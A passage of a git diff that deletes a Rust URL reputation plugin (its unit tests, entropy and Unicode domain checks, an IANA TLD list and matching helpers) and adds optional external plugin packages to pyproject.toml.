plugin.validate_url(url); - - assert!(!result.continue_processing); - assert_eq!( - result.violation.unwrap().reason, - "Domain unicode is not secure" - ); - } - - #[test] - fn test_is_domain_unicode_invalid_characters() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - - let url = "https://exa!mple.com"; - let result = plugin.validate_url(url); - - assert!(!result.continue_processing); - assert_eq!( - result.violation.unwrap().reason, - "Domain unicode is not secure" - ); - } - - #[test] - fn test_url_valid_ipv4() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - - let url = "https://192.168.0.1:442"; - let result = plugin.validate_url(url); - - assert!(result.continue_processing); - } - - #[test] - fn test_url_invalid_ipv4() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - - let url = "https://332.168.0.1:442"; - let result = plugin.validate_url(url); - - assert!(!result.continue_processing); - } - - #[test] - fn test_url_valid_ipv6() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - - let url = "https://[2001:0db8:020c:0001:0000:0000:0000:0bbb]:442/"; - let result = plugin.validate_url(url); - - assert!(result.continue_processing); - } - - #[test] - fn test_url_invalid_ipv6() { - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: true, - entropy_threshold: 5.0, - block_non_secure_http: true, - }; - let plugin = URLReputationPlugin::new(config); - - let url = "https://[2001:db8::85a3::8a2e:370:7334 ]:442/"; - let result = plugin.validate_url(url); - - assert!(!result.continue_processing); - } - - #[test] - fn test_invalid_allowed_regex_pattern() { - // Test that invalid regex patterns in allowed_patterns are logged and skipped - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: vec![ - "valid\\.pattern".to_string(), - "[invalid(regex".to_string(), // Invalid regex - "another\\.valid".to_string(), - ], - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: false, - entropy_threshold: 0.0, - block_non_secure_http: false, - }; - let plugin = URLReputationPlugin::new(config); - - // Should have compiled 2 valid patterns, skipped 1 invalid - assert_eq!(plugin.allowed_patterns.len(), 2); - - // Valid pattern should still work - let result = plugin.validate_url("https://example.com/valid.pattern"); - assert!(result.continue_processing); - } - - #[test] - fn test_invalid_blocked_regex_pattern() { - // Test that invalid regex patterns in blocked_patterns are logged and skipped - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: vec![ - "valid.*pattern".to_string(), - "*invalid[regex".to_string(), // Invalid regex - "another.*blocked".to_string(), - ], - use_heuristic_check: false, - entropy_threshold: 0.0, - block_non_secure_http: false, - }; - let plugin = URLReputationPlugin::new(config); - - // Should have compiled 2 valid patterns, skipped 1 invalid - assert_eq!(plugin.blocked_patterns.len(), 2); - - // Valid pattern should still work - let result = plugin.validate_url("https://example.com/valid-pattern-test"); - assert!(!result.continue_processing); - assert_eq!(result.violation.unwrap().reason, "Blocked pattern"); - } - - #[test] - fn test_case_insensitive_whitelist() { - // Test that domain normalization works for whitelist - let config = URLReputationConfig { - whitelist_domains: HashSet::from(["Example.COM".to_string()]), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::new(), - blocked_patterns: Vec::new(), - use_heuristic_check: false, - entropy_threshold: 0.0, - block_non_secure_http: false, - }; - let plugin = URLReputationPlugin::new(config); - - // Lowercase URL should match uppercase whitelist entry - let result = plugin.validate_url("https://example.com/path"); - assert!(result.continue_processing); - - // Mixed case should also work - let result = plugin.validate_url("https://EXAMPLE.com/path"); - assert!(result.continue_processing); - } - - #[test] - fn test_case_insensitive_blocked() { - // Test that domain normalization works for blocked domains - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::from(["BAD.Example".to_string()]), - blocked_patterns: Vec::new(), - use_heuristic_check: false, - entropy_threshold: 0.0, - block_non_secure_http: false, - }; - let plugin = URLReputationPlugin::new(config); - - // Lowercase URL should match mixed-case blocked entry - let result = plugin.validate_url("https://bad.example/path"); - assert!(!result.continue_processing); - assert_eq!(result.violation.unwrap().reason, "Domain in blocked set"); - } - - #[test] - fn test_subdomain_matching() { - // Test that subdomains are properly matched - let config = URLReputationConfig { - whitelist_domains: HashSet::new(), - allowed_patterns: Vec::new(), - blocked_domains: HashSet::from(["blocked.com".to_string()]), - blocked_patterns: Vec::new(), - use_heuristic_check: false, - entropy_threshold: 0.0, - block_non_secure_http: false, - }; - let plugin = URLReputationPlugin::new(config); - - // Subdomain should be blocked - let result = plugin.validate_url("https://api.blocked.com/v1"); - assert!(!result.continue_processing); - - // Deep subdomain should also be blocked - let result = plugin.validate_url("https://deep.api.blocked.com/v1"); - assert!(!result.continue_processing); - } -} diff --git a/plugins_rust/url_reputation/src/filters/heuristic.rs b/plugins_rust/url_reputation/src/filters/heuristic.rs deleted file mode 100644 index c73edc2774..0000000000 --- a/plugins_rust/url_reputation/src/filters/heuristic.rs +++ /dev/null @@ -1,92 +0,0 @@ -// The heuristic module try to detect Domain Generation Algorithms (DGS) -// Computes the Shannon entropy of a string to measure randomness of the domain. -use super::iana_tlds::VALID_TLD_SET; -use idna::domain_to_unicode; -use unicode_security::{GeneralSecurityProfile, RestrictionLevel, RestrictionLevelDetection}; - -fn shannon_entropy(domain: &str, domain_len: usize) -> f32 { - // Calculate Shannon entropy of a string. - // - // input: - // domain: the string to calculate entropy for. - // domain_len: the length of the string. - // output: - // the Shannon entropy of the string. - if domain.is_empty() { - return 0.0; - } - let mut frequency = [0usize; 256]; - let mut entropy = 0.0; - for &b in domain.as_bytes() { - frequency[b as usize] += 1; - } - - for count in frequency.iter() { - if count > &0 { - let p = (*count as f32) / (domain_len as f32); - entropy += -p * p.log2() - } - } - entropy -} - -pub fn passed_entropy(domain: &str, entropy_threshold: f32) -> bool { - let domain_len = domain.len(); - // do not check entropy for small domains - if domain_len < 8 { - return true; - } - shannon_entropy(domain, domain_len) <= entropy_threshold -} - -pub fn is_tld_legal(domain: &str) -> bool { - // Check for IANA database for valid tld - let tld = domain - .trim() - .rsplit('.') - .next() - .unwrap_or("") - .to_ascii_lowercase(); - VALID_TLD_SET.contains(&tld) -} - -pub fn is_domain_unicode_secure(domain: &str) -> bool { - let (unicode, errors) = domain_to_unicode(domain); - if errors.is_err() || unicode.len() > 253 { - return false; - } - - for label in unicode.split('.') { - if label.is_empty() { - return false; - } - - // Strip hyphens - let cleaned: String = label.chars().filter(|c| *c != '-').collect(); - if cleaned.is_empty() { - return false; - } - - // Reject invisible or invalid identifier characters - if !cleaned - .chars() - .all(GeneralSecurityProfile::identifier_allowed) - { - return false; - } - // Restriction level check - let level = cleaned.detect_restriction_level(); - match level { - RestrictionLevel::ASCIIOnly - | RestrictionLevel::SingleScript - | RestrictionLevel::HighlyRestrictive => {} - RestrictionLevel::ModeratelyRestrictive - | RestrictionLevel::MinimallyRestrictive - | RestrictionLevel::Unrestricted => { - return false; - } - } - } - - true -} diff --git a/plugins_rust/url_reputation/src/filters/iana_tlds.rs b/plugins_rust/url_reputation/src/filters/iana_tlds.rs deleted file mode 100644 index 89d5cae85b..0000000000 --- a/plugins_rust/url_reputation/src/filters/iana_tlds.rs +++ /dev/null @@ -1,364 +0,0 @@ -use phf::{Set, phf_set}; - -// # Version 2026021400, Last Updated Sat Feb 14 07:07:01 2026 UTC -pub static VALID_TLD_SET: Set<&'static str> = phf_set! { - "aaa", "aarp", "abb", "abbott", "abbvie", - "abc", "able", "abogado", "abudhabi", - "ac", "academy", "accenture", "accountant", - "accountants", "aco", "actor", "ad", - "ads", "adult", "ae", "aeg", - "aero", "aetna", "af", "afl", - "africa", "ag", "agakhan", "agency", - "ai", "aig", "airbus", "airforce", - "airtel", "akdn", "al", "alibaba", - "alipay", "allfinanz", "allstate", "ally", - "alsace", "alstom", "am", "amazon", - "americanexpress", "americanfamily", "amex", "amfam", - "amica", "amsterdam", "analytics", "android", - "anquan", "anz", "ao", "aol", - "apartments", "app", "apple", "aq", - "aquarelle", "ar", "arab", "aramco", - "archi", "army", "arpa", "art", - "arte", "as", "asda", "asia", - "associates", "at", "athleta", "attorney", - "au", "auction", "audi", "audible", - "audio", "auspost", "author", "auto", - "autos", "aw", "aws", "ax", - "axa", "az", "azure", "ba", - "baby", "baidu", "banamex", "band", - "bank", "bar", "barcelona", "barclaycard", - "barclays", "barefoot", "bargains", "baseball", - "basketball", "bauhaus", "bayern", "bb", - "bbc", "bbt", "bbva", "bcg", - "bcn", "bd", "be", "beats", - "beauty", "beer", "berlin", "best", - "bestbuy", "bet", "bf", "bg", - "bh", "bharti", "bi", "bible", - "bid", "bike", "bing", "bingo", - "bio", "biz", "bj", "black", - "blackfriday", "blockbuster", "blog", "bloomberg", - "blue", "bm", "bms", "bmw", - "bn", "bnpparibas", "bo", "boats", - "boehringer", "bofa", "bom", "bond", - "boo", "book", "booking", "bosch", - "bostik", "boston", "bot", "boutique", - "box", "br", "bradesco", "bridgestone", - "broadway", "broker", "brother", "brussels", - "bs", "bt", "build", "builders", - "business", "buy", "buzz", "bv", - "bw", "by", "bz", "bzh", - "ca", "cab", "cafe", "cal", - "call", "calvinklein", "cam", "camera", - "camp", "canon", "capetown", "capital", - "capitalone", "car", "caravan", "cards", - "care", "career", "careers", "cars", - "casa", "case", "cash", "casino", - "cat", "catering", "catholic", "cba", - "cbn", "cbre", "cc", "cd", - "center", "ceo", "cern", "cf", - "cfa", "cfd", "cg", "ch", - "chanel", "channel", "charity", "chase", - "chat", "cheap", "chintai", "christmas", - "chrome", "church", "ci", "cipriani", - "circle", "cisco", "citadel", "citi", - "citic", "city", "ck", "cl", - "claims", "cleaning", "click", "clinic", - "clinique", "clothing", "cloud", "club", - "clubmed", "cm", "cn", "co", - "coach", "codes", "coffee", "college", - "cologne", "com", "commbank", "community", - "company", "compare", "computer", "comsec", - "condos", "construction", "consulting", "contact", - "contractors", "cooking", "cool", "coop", - "corsica", "country", "coupon", "coupons", - "courses", "cpa", "cr", "credit", - "creditcard", "creditunion", "cricket", "crown", - "crs", "cruise", "cruises", "cu", - "cuisinella", "cv", "cw", "cx", - "cy", "cymru", "cyou", "cz", - "dad", "dance", "data", "date", - "dating", "datsun", "day", "dclk", - "dds", "de", "deal", "dealer", - "deals", "degree", "delivery", "dell", - "deloitte", "delta", "democrat", "dental", - "dentist", "desi", "design", "dev", - "dhl", "diamonds", "diet", "digital", - "direct", "directory", "discount", "discover", - "dish", "diy", "dj", "dk", - "dm", "dnp", "do", "docs", - "doctor", "dog", "domains", "dot", - "download", "drive", "dtv", "dubai", - "dupont", "durban", "dvag", "dvr", - "dz", "earth", "eat", "ec", - "eco", "edeka", "edu", "education", - "ee", "eg", "email", "emerck", - "energy", "engineer", "engineering", "enterprises", - "epson", "equipment", "er", "ericsson", - "erni", "es", "esq", "estate", - "et", "eu", "eurovision", "eus", - "events", "exchange", "expert", "exposed", - "express", "extraspace", "fage", "fail", - "fairwinds", "faith", "family", "fan", - "fans", "farm", "farmers", "fashion", - "fast", "fedex", "feedback", "ferrari", - "ferrero", "fi", "fidelity", "fido", - "film", "final", "finance", "financial", - "fire", "firestone", "firmdale", "fish", - "fishing", "fit", "fitness", "fj", - "fk", "flickr", "flights", "flir", - "florist", "flowers", "fly", "fm", - "fo", "foo", "food", "football", - "ford", "forex", "forsale", "forum", - "foundation", "fox", "fr", "free", - "fresenius", "frl", "frogans", "frontier", - "ftr", "fujitsu", "fun", "fund", - "furniture", "futbol", "fyi", "ga", - "gal", "gallery", "gallo", "gallup", - "game", "games", "gap", "garden", - "gay", "gb", "gbiz", "gd", - "gdn", "ge", "gea", "gent", - "genting", "george", "gf", "gg", - "ggee", "gh", "gi", "gift", - "gifts", "gives", "giving", "gl", - "glass", "gle", "global", "globo", - "gm", "gmail", "gmbh", "gmo", - "gmx", "gn", "godaddy", "gold", - "goldpoint", "golf", "goodyear", "goog", - "google", "gop", "got", "gov", - "gp", "gq", "gr", "grainger", - "graphics", "gratis", "green", "gripe", - "grocery", "group", "gs", "gt", - "gu", "gucci", "guge", "guide", - "guitars", "guru", "gw", "gy", - "hair", "hamburg", "hangout", "haus", - "hbo", "hdfc", "hdfcbank", "health", - "healthcare", "help", "helsinki", "here", - "hermes", "hiphop", "hisamitsu", "hitachi", - "hiv", "hk", "hkt", "hm", - "hn", "hockey", "holdings", "holiday", - "homedepot", "homegoods", "homes", "homesense", - "honda", "horse", "hospital", "host", - "hosting", "hot", "hotels", "hotmail", - "house", "how", "hr", "hsbc", - "ht", "hu", "hughes", "hyatt", - "hyundai", "ibm", "icbc", "ice", - "icu", "id", "ie", "ieee", - "ifm", "ikano", "il", "im", - "imamat", "imdb", "immo", "immobilien", - "in", "inc", "industries", "infiniti", - "info", "ing", "ink", "institute", - "insurance", "insure", "int", "international", - "intuit", "investments", "io", "ipiranga", - "iq", "ir", "irish", "is", - "ismaili", "ist", "istanbul", "it", - "itau", "itv", "jaguar", "java", - "jcb", "je", "jeep", "jetzt", - "jewelry", "jio", "jll", "jm", - "jmp", "jnj", "jo", "jobs", - "joburg", "jot", "joy", "jp", - "jpmorgan", "jprs", "juegos", "juniper", - "kaufen", "kddi", "ke", "kerryhotels", - "kerryproperties", "kfh", "kg", "kh", - "ki", "kia", "kids", "kim", - "kindle", "kitchen", "kiwi", "km", - "kn", "koeln", "komatsu", "kosher", - "kp", "kpmg", "kpn", "kr", - "krd", "kred", "kuokgroup", "kw", - "ky", "kyoto", "kz", "la", - "lacaixa", "lamborghini", "lamer", "land", - "landrover", "lanxess", "lasalle", "lat", - "latino", "latrobe", "law", "lawyer", - "lb", "lc", "lds", "lease", - "leclerc", "lefrak", "legal", "lego", - "lexus", "lgbt", "li", "lidl", - "life", "lifeinsurance", "lifestyle", "lighting", - "like", "lilly", "limited", "limo", - "lincoln", "link", "live", "living", - "lk", "llc", "llp", "loan", - "loans", "locker", "locus", "lol", - "london", "lotte", "lotto", "love", - "lpl", "lplfinancial", "lr", "ls", - "lt", "ltd", "ltda", "lu", - "lundbeck", "luxe", "luxury", "lv", - "ly", "ma", "madrid", "maif", - "maison", "makeup", "man", "management", - "mango", "map", "market", "marketing", - "markets", "marriott", "marshalls", "mattel", - "mba", "mc", "mckinsey", "md", - "me", "med", "media", "meet", - "melbourne", "meme", "memorial", "men", - "menu", "merckmsd", "mg", "mh", - "miami", "microsoft", "mil", "mini", - "mint", "mit", "mitsubishi", "mk", - "ml", "mlb", "mls", "mm", - "mma", "mn", "mo", "mobi", - "mobile", "moda", "moe", "moi", - "mom", "monash", "money", "monster", - "mormon", "mortgage", "moscow", "moto", - "motorcycles", "mov", "movie", "mp", - "mq", "mr", "ms", "msd", - "mt", "mtn", "mtr", "mu", - "museum", "music", "mv", "mw", - "mx", "my", "mz", "na", - "nab", "nagoya", "name", "navy", - "nba", "nc", "ne", "nec", - "net", "netbank", "netflix", "network", - "neustar", "new", "news", "next", - "nextdirect", "nexus", "nf", "nfl", - "ng", "ngo", "nhk", "ni", - "nico", "nike", "nikon", "ninja", - "nissan", "nissay", "nl", "no", - "nokia", "norton", "now", "nowruz", - "nowtv", "np", "nr", "nra", - "nrw", "ntt", "nu", "nyc", - "nz", "obi", "observer", "office", - "okinawa", "olayan", "olayangroup", "ollo", - "om", "omega", "one", "ong", - "onl", "online", "ooo", "open", - "oracle", "orange", "org", "organic", - "origins", "osaka", "otsuka", "ott", - "ovh", "pa", "page", "panasonic", - "paris", "pars", "partners", "parts", - "party", "pay", "pccw", "pe", - "pet", "pf", "pfizer", "pg", - "ph", "pharmacy", "phd", "philips", - "phone", "photo", "photography", "photos", - "physio", "pics", "pictet", "pictures", - "pid", "pin", "ping", "pink", - "pioneer", "pizza", "pk", "pl", - "place", "play", "playstation", "plumbing", - "plus", "pm", "pn", "pnc", - "pohl", "poker", "politie", "porn", - "post", "pr", "praxi", "press", - "prime", "pro", "prod", "productions", - "prof", "progressive", "promo", "properties", - "property", "protection", "pru", "prudential", - "ps", "pt", "pub", "pw", - "pwc", "py", "qa", "qpon", - "quebec", "quest", "racing", "radio", - "re", "read", "realestate", "realtor", - "realty", "recipes", "red", "redumbrella", - "rehab", "reise", "reisen", "reit", - "reliance", "ren", "rent", "rentals", - "repair", "report", "republican", "rest", - "restaurant", "review", "reviews", "rexroth", - "rich", "richardli", "ricoh", "ril", - "rio", "rip", "ro", "rocks", - "rodeo", "rogers", "room", "rs", - "rsvp", "ru", "rugby", "ruhr", - "run", "rw", "rwe", "ryukyu", - "sa", "saarland", "safe", "safety", - "sakura", "sale", "salon", "samsclub", - "samsung", "sandvik", "sandvikcoromant", "sanofi", - "sap", "sarl", "sas", "save", - "saxo", "sb", "sbi", "sbs", - "sc", "scb", "schaeffler", "schmidt", - "scholarships", "school", "schule", "schwarz", - "science", "scot", "sd", "se", - "search", "seat", "secure", "security", - "seek", "select", "sener", "services", - "seven", "sew", "sex", "sexy", - "sfr", "sg", "sh", "shangrila", - "sharp", "shell", "shia", "shiksha", - "shoes", "shop", "shopping", "shouji", - "show", "si", "silk", "sina", - "singles", "site", "sj", "sk", - "ski", "skin", "sky", "skype", - "sl", "sling", "sm", "smart", - "smile", "sn", "sncf", "so", - "soccer", "social", "softbank", "software", - "sohu", "solar", "solutions", "song", - "sony", "soy", "spa", "space", - "sport", "spot", "sr", "srl", - "ss", "st", "stada", "staples", - "star", "statebank", "statefarm", "stc", - "stcgroup", "stockholm", "storage", "store", - "stream", "studio", "study", "style", - "su", "sucks", "supplies", "supply", - "support", "surf", "surgery", "suzuki", - "sv", "swatch", "swiss", "sx", - "sy", "sydney", "systems", "sz", - "tab", "taipei", "talk", "taobao", - "target", "tatamotors", "tatar", "tattoo", - "tax", "taxi", "tc", "tci", - "td", "tdk", "team", "tech", - "technology", "tel", "temasek", "tennis", - "teva", "tf", "tg", "th", - "thd", "theater", "theatre", "tiaa", - "tickets", "tienda", "tips", "tires", - "tirol", "tj", "tjmaxx", "tjx", - "tk", "tkmaxx", "tl", "tm", - "tmall", "tn", "to", "today", - "tokyo", "tools", "top", "toray", - "toshiba", "total", "tours", "town", - "toyota", "toys", "tr", "trade", - "trading", "training", "travel", "travelers", - "travelersinsurance", "trust", "trv", "tt", - "tube", "tui", "tunes", "tushu", - "tv", "tvs", "tw", "tz", - "ua", "ubank", "ubs", "ug", - "uk", "unicom", "university", "uno", - "uol", "ups", "us", "uy", - "uz", "va", "vacations", "vana", - "vanguard", "vc", "ve", "vegas", - "ventures", "verisign", "versicherung", "vet", - "vg", "vi", "viajes", "video", - "vig", "viking", "villas", "vin", - "vip", "virgin", "visa", "vision", - "viva", "vivo", "vlaanderen", "vn", - "vodka", "volvo", "vote", "voting", - "voto", "voyage", "vu", "wales", - "walmart", "walter", "wang", "wanggou", - "watch", "watches", "weather", "weatherchannel", - "webcam", "weber", "website", "wed", - "wedding", "weibo", "weir", "wf", - "whoswho", "wien", "wiki", "williamhill", - "win", "windows", "wine", "winners", - "wme", "woodside", "work", "works", - "world", "wow", "ws", "wtc", - "wtf", "xbox", "xerox", "xihuan", - "xin", "xn--11b4c3d", "xn--1ck2e1b", "xn--1qqw23a", - "xn--2scrj9c", "xn--30rr7y", "xn--3bst00m", "xn--3ds443g", - "xn--3e0b707e", "xn--3hcrj9c", "xn--3pxu8k", "xn--42c2d9a", - "xn--45br5cyl", "xn--45brj9c", "xn--45q11c", "xn--4dbrk0ce", - "xn--4gbrim", "xn--54b7fta0cc", "xn--55qw42g", "xn--55qx5d", - "xn--5su34j936bgsg", "xn--5tzm5g", "xn--6frz82g", "xn--6qq986b3xl", - "xn--80adxhks", "xn--80ao21a", "xn--80aqecdr1a", "xn--80asehdb", - "xn--80aswg", "xn--8y0a063a", "xn--90a3ac", "xn--90ae", - "xn--90ais", "xn--9dbq2a", "xn--9et52u", "xn--9krt00a", - "xn--b4w605ferd", "xn--bck1b9a5dre4c", "xn--c1avg", "xn--c2br7g", - "xn--cck2b3b", "xn--cckwcxetd", "xn--cg4bki", "xn--clchc0ea0b2g2a9gcd", - "xn--czr694b", "xn--czrs0t", "xn--czru2d", "xn--d1acj3b", - "xn--d1alf", "xn--e1a4c", "xn--eckvdtc9d", "xn--efvy88h", - "xn--fct429k", "xn--fhbei", "xn--fiq228c5hs", "xn--fiq64b", - "xn--fiqs8s", "xn--fiqz9s", "xn--fjq720a", "xn--flw351e", - "xn--fpcrj9c3d", "xn--fzc2c9e2c", "xn--fzys8d69uvgm", "xn--g2xx48c", - "xn--gckr3f0f", "xn--gecrj9c", "xn--gk3at1e", "xn--h2breg3eve", - "xn--h2brj9c", "xn--h2brj9c8c", "xn--hxt814e", "xn--i1b6b1a6a2e", - "xn--imr513n", "xn--io0a7i", "xn--j1aef", "xn--j1amh", - "xn--j6w193g", "xn--jlq480n2rg", "xn--jvr189m", "xn--kcrx77d1x4a", - "xn--kprw13d", "xn--kpry57d", "xn--kput3i", "xn--l1acc", - "xn--lgbbat1ad8j", "xn--mgb9awbf", "xn--mgba3a3ejt", "xn--mgba3a4f16a", - "xn--mgba7c0bbn0a", "xn--mgbaam7a8h", "xn--mgbab2bd", "xn--mgbah1a3hjkrd", - "xn--mgbai9azgqp6j", "xn--mgbayh7gpa", "xn--mgbbh1a", "xn--mgbbh1a71e", - "xn--mgbc0a9azcg", "xn--mgbca7dzdo", "xn--mgbcpq6gpa1a", "xn--mgberp4a5d4ar", - "xn--mgbgu82a", "xn--mgbi4ecexp", "xn--mgbpl2fh", "xn--mgbt3dhd", - "xn--mgbtx2b", "xn--mgbx4cd0ab", "xn--mix891f", "xn--mk1bu44c", - "xn--mxtq1m", "xn--ngbc5azd", "xn--ngbe9e0a", "xn--ngbrx", - "xn--node", "xn--nqv7f", "xn--nqv7fs00ema", "xn--nyqy26a", - "xn--o3cw4h", "xn--ogbpf8fl", "xn--otu796d", "xn--p1acf", - "xn--p1ai", "xn--pgbs0dh", "xn--pssy2u", "xn--q7ce6a", - "xn--q9jyb4c", "xn--qcka1pmc", "xn--qxa6a", "xn--qxam", - "xn--rhqv96g", "xn--rovu88b", "xn--rvc1e0am3e", "xn--s9brj9c", - "xn--ses554g", "xn--t60b56a", "xn--tckwe", "xn--tiq49xqyj", - "xn--unup4y", "xn--vermgensberater-ctb", "xn--vermgensberatung-pwb", "xn--vhquv", - "xn--vuq861b", "xn--w4r85el8fhu5dnra", "xn--w4rs40l", "xn--wgbh1c", - "xn--wgbl6a", "xn--xhq521b", "xn--xkc2al3hye2a", "xn--xkc2dl3a5ee0h", - "xn--y9a3aq", "xn--yfro4i67o", "xn--ygbi2ammx", "xn--zfr164b", - "xxx", "xyz", "yachts", "yahoo", - "yamaxun", "yandex", "ye", "yodobashi", - "yoga", "yokohama", "you", "youtube", - "yt", "yun", "za", "zappos", - "zara", "zero", "zip", "zm", - "zone", "zuerich", "zw" -}; diff --git a/plugins_rust/url_reputation/src/filters/mod.rs b/plugins_rust/url_reputation/src/filters/mod.rs deleted file mode 100644 index 1006396c98..0000000000 --- a/plugins_rust/url_reputation/src/filters/mod.rs +++ /dev/null @@ -1,3 +0,0 @@ -pub mod heuristic; -pub mod iana_tlds; -pub mod patterns; diff --git a/plugins_rust/url_reputation/src/filters/patterns.rs b/plugins_rust/url_reputation/src/filters/patterns.rs deleted file mode 100644 index 47c9a4f606..0000000000 --- a/plugins_rust/url_reputation/src/filters/patterns.rs +++ /dev/null @@ -1,26 +0,0 @@ -use regex::Regex; -use std::collections::HashSet; - -pub fn in_blocked_patterns_regex(domain: &str, blocked_patterns: &[Regex]) -> bool { - blocked_patterns.iter().any(|re| re.is_match(domain)) -} - -pub fn in_allow_patterns_regex(domain: &str, allowed_pattens: &[Regex]) -> bool { - allowed_pattens.iter().any(|re| re.is_match(domain)) -} - -pub fn in_domain_list(domain: &str, check_domains: &HashSet) -> bool { - if check_domains.contains(domain) { - return true; - } - - let parts: Vec<&str> = domain.split('.').collect(); - for i in 0..parts.len() { - let candidate = parts[i..].join("."); - if check_domains.contains(&candidate) { - return true; - } - } - - false -} diff --git a/plugins_rust/url_reputation/src/lib.rs b/plugins_rust/url_reputation/src/lib.rs deleted file mode 100644 index 07b1ccc129..0000000000 --- a/plugins_rust/url_reputation/src/lib.rs +++ /dev/null @@ -1,11 +0,0 @@ -use pyo3::prelude::*; -pub mod engine; -pub mod filters; -pub mod types; - -#[pymodule] -fn url_reputation_rust(m: &Bound<'_, PyModule>) -> PyResult<()> { - pyo3_log::init(); - m.add_class::()?; - Ok(()) -} diff --git a/plugins_rust/url_reputation/src/types.rs b/plugins_rust/url_reputation/src/types.rs deleted file mode 100644 index 0f6936b5f3..0000000000 --- a/plugins_rust/url_reputation/src/types.rs +++ /dev/null @@ -1,79 +0,0 @@ -use pyo3::{prelude::*, types::PyDict}; -use std::collections::{HashMap, HashSet}; - -#[pyclass] -#[derive(FromPyObject)] -pub struct URLReputationConfig { - pub whitelist_domains: HashSet, - pub allowed_patterns: Vec, - pub blocked_domains: HashSet, - pub blocked_patterns: Vec, - pub use_heuristic_check: bool, - pub entropy_threshold: f32, // downcast from python float which is f64 - pub block_non_secure_http: bool, -} - -impl URLReputationConfig { - /// Normalize domains to lowercase for case-insensitive matching - pub fn normalize_domains(mut self) -> Self { - self.whitelist_domains = self - .whitelist_domains - .into_iter() - .map(|d| d.to_lowercase()) - .collect(); - self.blocked_domains = self - .blocked_domains - .into_iter() - .map(|d| d.to_lowercase()) - .collect(); - self - } -} - -#[pyclass(from_py_object)] -#[derive(Debug, Clone)] -pub struct PluginViolation { - #[pyo3(get, set)] - pub reason: String, - #[pyo3(get, set)] - pub description: String, - #[pyo3(get, set)] - pub code: String, - #[pyo3(get, set)] - pub details: Option>, -} - -impl PluginViolation { - pub fn to_py_dict(&self, py: Python) -> PyResult> { - let dict = PyDict::new(py); - dict.set_item("reason", &self.reason)?; - dict.set_item("description", &self.description)?; - dict.set_item("code", &self.code)?; - match &self.details { - Some(details) => dict.set_item("details", details)?, - None => dict.set_item("details", py.None())?, - } - Ok(dict.into()) - } -} - -#[pyclass] -#[derive(Debug)] -pub struct URLPluginResult { - #[pyo3(get, set)] - pub continue_processing: bool, - #[pyo3(get, set)] - pub violation: Option, -} - -impl URLPluginResult { - pub fn to_py_dict(&self, py: Python) -> PyResult> { - let dict = PyDict::new(py); - dict.set_item("continue_processing", self.continue_processing)?; - match &self.violation { - Some(v) => dict.set_item("violation", v.to_py_dict(py)?)?, - None => dict.set_item("violation", py.None())?, - } - Ok(dict.into()) - } -} diff --git a/plugins_rust/url_reputation/url_reputation_rust.pyi b/plugins_rust/url_reputation/url_reputation_rust.pyi deleted file mode 100644 index 7a162dd15f..0000000000 --- a/plugins_rust/url_reputation/url_reputation_rust.pyi +++ /dev/null @@ -1,5 +0,0 @@ -from typing import Any - -class URLReputationPlugin: - def __init__(self, config: Any) -> None: ... - def validate_url_py(self, url: str) -> dict: ... diff --git a/pyproject.toml b/pyproject.toml index ec580757ad..a747a683fa 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -9,7 +9,7 @@ build-backend = "setuptools.build_meta" [tool.uv] exclude-newer = "10 days" -exclude-newer-package = { requests = "2026-03-25T15:10:42Z", langchain-openai = "2026-03-23T18:59:20Z", langchain-core = "2026-03-24T18:48:45Z" } +exclude-newer-package = { "cpex-rate-limiter" = "2026-04-09T23:59:59Z", "cpex-encoded-exfil-detection" = "2026-04-09T23:59:59Z", "cpex-pii-filter" = "2026-04-09T23:59:59Z", "cpex-retry-with-backoff" = "2026-04-09T23:59:59Z", "cpex-secrets-detection" = "2026-04-09T23:59:59Z", "cpex-url-reputation" = "2026-04-09T23:59:59Z" } # ---------------------------------------------------------------- # 📦 Core project metadata (PEP 621) @@ -258,6 +258,17 @@ templating = [ "cookiecutter>=2.7.1", ] +# External plugin packages (optional) +# Install with: pip install mcp-contextforge-gateway[plugins] +plugins = [ + "cpex-rate-limiter>=0.0.3", + "cpex-encoded-exfil-detection>=0.2.0", + "cpex-pii-filter>=0.2.0", + "cpex-retry-with-backoff>=0.1.0", + "cpex-secrets-detection>=0.1.0", + "cpex-url-reputation>=0.1.1", +] + # gRPC Support (EXPERIMENTAL - optional, disabled by default) # Install with: pip install mcp-contextforge-gateway[grpc] grpc = [ @@ -282,7 +293,7 @@ all = [ ] dev-all = [ - "mcp-contextforge-gateway[redis,dev]>=0.9.0", + "mcp-contextforge-gateway[redis,dev,plugins]>=0.9.0", ] # -------------------------------------------------------------------- diff --git a/scripts/license_checker.py b/scripts/license_checker.py index eeba12aeda..9975e95548 100755 --- a/scripts/license_checker.py +++ b/scripts/license_checker.py @@ -9,24 +9,28 @@ - Rust crate licenses via `cargo-license` """ +# Future from __future__ import annotations +# Standard import argparse +from collections import defaultdict import csv +from dataclasses import dataclass import json import os +from pathlib import Path import re import shutil import subprocess import sys -from collections import defaultdict -from dataclasses import dataclass -from pathlib import Path from typing 